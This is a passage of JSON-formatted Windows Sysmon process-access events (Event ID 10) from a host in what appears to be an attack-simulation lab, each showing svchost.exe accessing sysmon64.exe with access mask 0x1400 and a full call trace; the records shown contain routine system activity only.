6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2484,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2485,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2486,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2487,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2488,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2489,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2490,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2491,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
